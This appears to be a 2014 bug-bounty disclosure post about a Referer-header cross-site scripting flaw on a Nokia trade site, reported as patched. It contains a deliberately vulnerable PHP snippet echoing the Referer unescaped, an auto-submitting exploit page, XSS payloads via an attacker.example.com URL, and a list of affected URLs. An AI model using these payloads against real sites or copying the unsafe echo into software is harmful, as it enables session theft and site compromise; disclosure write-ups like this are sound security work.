Tuesday, 26 August 2014

Nokia : Exploiting cross-site scripting in Referer header in Trade.online.nokia.com



Little Insight: 

 

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks or referer page back link . The payload Referer: javascript:prompt(1); was submitted in the Referer HTTP header. This input was store on page back link when user click back link that's make an XSS.


How This Work?

 

Suppose we have an application that generates a "Back" link from Referer header

<?php
echo '<a href="';
echo $_SERVER['HTTP_REFERER'];
echo '">Back</a>\n';
?>
 
 
We can inject HTML and JavaScript if we can set the Referer header. This can be done if we first get the victim to visit a page created by the attacker. Consider the following page (let's call it exploit.html):


<html>
<body>
<form   id="jeet"
        name="jeet"
        method="GET"
        action="http://victim.example.com/xss.php">
</form>
<script>
document.getElementById("jeet").submit();
</script>
</body>
</html>
 
 
 
If the victim is tricked into visiting 

http://attacker.example.com/exploit.html?<script>alert(1);</script> 

he will end up on the vulnerable page with the Referer header containing XSS attack.

This attack works in Internet Explorer, but does not work in Firefox, because Firefox will URL-encode the characters after the question mark. 



My Finding....

 

Host: trade.online.nokia.com


vulnrable pages :
https://trade.online.nokia.com/cps/
https://trade.online.nokia.com/cps/script/
https://trade.online.nokia.com/cps/script/common/
https://trade.online.nokia.com/cps/script/console/.
https://trade.online.nokia.com/cps/script/preview/.
https://trade.online.nokia.com/cps/theme/common/corporate/style/.
https://trade.online.nokia.com/cps/theme/common/corporate/
https://trade.online.nokia.com/cps/theme/common/
https://trade.online.nokia.com/cps/theme/
https://trade.online.nokia.com/cps/theme/console/corporate/style/
https://trade.online.nokia.com/cps/theme/console/corporate/
https://trade.online.nokia.com/cps/theme/console/
https://trade.online.nokia.com/login/fonts/.
https://trade.online.nokia.com/pics/
https://trade.online.nokia.com/pictures/
https://trade.online.nokia.com/siteminderagent/dmspages/.
https://trade.online.nokia.com/siteminderagent/forms/.
https://trade.online.nokia.com/siteminderagent/
https://trade.online.nokia.com/siteminderagent/pw/.

Continue..............

 

 Normal Request..


 After Payload...


Xss....on back link..



More Information

 

The vulnerability mentioned here has been confirmed patched by the Nokia Security Team.